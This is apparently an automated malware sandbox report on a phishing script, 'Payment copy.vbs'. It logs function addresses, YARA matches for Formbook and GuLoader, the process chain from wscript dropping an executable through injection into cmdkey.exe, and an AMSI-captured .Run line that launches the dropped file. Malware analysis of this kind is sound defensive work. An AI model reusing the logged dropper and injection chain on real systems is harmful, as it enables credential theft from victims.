Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339CF5C9	2_2_339CF5C9
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339C75C6	2_2_339C75C6
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339DA526	2_2_339DA526
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33910445	2_2_33910445
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33984BC0	2_2_33984BC0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33910B10	2_2_33910B10
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339CFB2E	2_2_339CFB2E
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339CFA89	2_2_339CFA89
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392FAA0	2_2_3392FAA0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339CCA13	2_2_339CCA13
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339CEA5B	2_2_339CEA5B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390E9A0	2_2_3390E9A0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339CE9A6	2_2_339CE9A6
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33926882	2_2_33926882
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339128C0	2_2_339128C0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339C78F3	2_2_339C78F3
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33913800	2_2_33913800
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339B0835	2_2_339B0835
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33919870	2_2_33919870
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392B870	2_2_3392B870
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338F6868	2_2_338F6868
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339CF872	2_2_339CF872
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339CEFBF	2_2_339CEFBF
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339C1FC6	2_2_339C1FC6
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33916FE0	2_2_33916FE0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3391CF00	2_2_3391CF00
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339CFF63	2_2_339CFF63
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33911EB2	2_2_33911EB2
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339C0EAD	2_2_339C0EAD
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339C9ED2	2_2_339C9ED2
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33902EE8	2_2_33902EE8
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33930E50	2_2_33930E50
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339B0E6D	2_2_339B0E6D
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33922DB0	2_2_33922DB0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33919DD0	2_2_33919DD0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339AFDF4	2_2_339AFDF4
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390AD00	2_2_3390AD00
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339CFD27	2_2_339CFD27
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339C7D4C	2_2_339C7D4C
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33910D69	2_2_33910D69
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339A9C98	2_2_339A9C98
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33928CDF	2_2_33928CDF
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392FCE0	2_2_3392FCE0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339DACEB	2_2_339DACEB
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33900C12	2_2_33900C12
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3391AC20	2_2_3391AC20
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339BEC4C	2_2_339BEC4C
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33913C60	2_2_33913C60
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339C6C69	2_2_339C6C69
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339CEC60	2_2_339CEC60
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_335FE3D5	2_2_335FE3D5
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_335FD8F8	2_2_335FD8F8
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_335FE4F3	2_2_335FE4F3
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_335FE88C	2_2_335FE88C
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_05C77D63	3_2_05C77D63
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_05C77168	3_2_05C77168
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_05C780FC	3_2_05C780FC
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_05C77C45	3_2_05C77C45
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02BED2EC	4_2_02BED2EC
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CB124C	4_2_02CB124C
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02BF1380	4_2_02BF1380
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C0E310	4_2_02C0E310
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CBF330	4_2_02CBF330
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C0B0D0	4_2_02C0B0D0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02BF00A0	4_2_02BF00A0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CB70F1	4_2_02CB70F1
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CAE076	4_2_02CAE076
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C051C0	4_2_02C051C0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C1B1E0	4_2_02C1B1E0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02BEF113	4_2_02BEF113
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C4717A	4_2_02C4717A
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CC010E	4_2_02CC010E
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C9D130	4_2_02C9D130
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CBA6C0	4_2_02CBA6C0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C736EC	4_2_02C736EC
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CBF6F6	4_2_02CBF6F6
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C00680	4_2_02C00680
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02BFC6E0	4_2_02BFC6E0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CAD646	4_2_02CAD646
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C24670	4_2_02C24670
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C1C600	4_2_02C1C600
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C9D62C	4_2_02C9D62C
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CB6757	4_2_02CB6757
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C0A760	4_2_02C0A760
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C02760	4_2_02C02760
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C00445	4_2_02C00445
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CBF5C9	4_2_02CBF5C9
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CB75C6	4_2_02CB75C6
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CCA526	4_2_02CCA526
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CBFA89	4_2_02CBFA89
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C1FAA0	4_2_02C1FAA0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CBEA5B	4_2_02CBEA5B
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CBCA13	4_2_02CBCA13
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C74BC0	4_2_02C74BC0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C00B10	4_2_02C00B10
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CBFB2E	4_2_02CBFB2E
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C028C0	4_2_02C028C0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CB18DA	4_2_02CB18DA
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CB78F3	4_2_02CB78F3
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C16882	4_2_02C16882
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C798B2	4_2_02C798B2
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C09870	4_2_02C09870
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C1B870	4_2_02C1B870
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CBF872	4_2_02CBF872
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C03800	4_2_02C03800
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02BE6868	4_2_02BE6868
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CA0835	4_2_02CA0835
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02BFE9A0	4_2_02BFE9A0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CBE9A6	4_2_02CBE9A6
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CB9ED2	4_2_02CB9ED2
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02BF2EE8	4_2_02BF2EE8
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CB0EAD	4_2_02CB0EAD
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C01EB2	4_2_02C01EB2
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C20E50	4_2_02C20E50
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CA0E6D	4_2_02CA0E6D
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CB1FC6	4_2_02CB1FC6
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C06FE0	4_2_02C06FE0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CBEFBF	4_2_02CBEFBF
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CBFF63	4_2_02CBFF63
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C0CF00	4_2_02C0CF00
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C18CDF	4_2_02C18CDF
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C1FCE0	4_2_02C1FCE0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CCACEB	4_2_02CCACEB
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C99C98	4_2_02C99C98
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CAEC4C	4_2_02CAEC4C
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C03C60	4_2_02C03C60
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CB6C69	4_2_02CB6C69
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CBEC60	4_2_02CBEC60
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02BF0C12	4_2_02BF0C12
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C0AC20	4_2_02C0AC20
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C09DD0	4_2_02C09DD0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C9FDF4	4_2_02C9FDF4
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C12DB0	4_2_02C12DB0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CB7D4C	4_2_02CB7D4C
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02C00D69	4_2_02C00D69
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02BFAD00	4_2_02BFAD00
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02CBFD27	4_2_02CBFD27
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02A2F0AD	4_2_02A2F0AD
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02A2E3D5	4_2_02A2E3D5
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02A2E88C	4_2_02A2E88C
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02A2D8F8	4_2_02A2D8F8
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_02A2E4F3	4_2_02A2E4F3

Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: String function: 02C6E692 appears 84 times
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: String function: 02C35050 appears 35 times
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: String function: 02BEB910 appears 266 times
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: String function: 02C47BE4 appears 88 times
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: String function: 02C7EF10 appears 105 times
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: String function: 33945050 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: String function: 004029FD appears 49 times
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: String function: 33957BE4 appears 79 times
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: String function: 338FB910 appears 244 times
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: String function: 3398EF10 appears 96 times
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: String function: 3397E692 appears 72 times

Source: Payment copy.vbs

Initial sample: Strings found which are bigger than 50

Source: 00000004.00000002.15051779853.0000000002930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.15051694421.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.13517983847.0000000033620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.evad.winVBS@7/11@1/1

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Code function: 1_2_004042BD GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

1_2_004042BD

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Code function: 1_2_00402036 CoCreateInstance,MultiByteToWideChar,

1_2_00402036

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment copy.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment copy.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Process created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Process created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Payment copy.vbs

Static file information: File size 1681870 > 1048576

Source:

Binary string: wntdll.pdb source: temp_executable.exe, cmdkey.exe

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\temp_executable.exe", "1", "true");

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.13293637281.00000000035AB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Code function: 1_2_00405EBC GetModuleHandleA,LoadLibraryA,GetProcAddress,

1_2_00405EBC

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 1_2_10002D40 push eax; ret	1_2_10002D6E
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339008CD push ecx; mov dword ptr [esp], ecx	2_2_339008D6
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_335FFF58 push edi; iretd	2_2_335FFF66
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_335F5BE8 push ss; iretd	2_2_335F5CB1
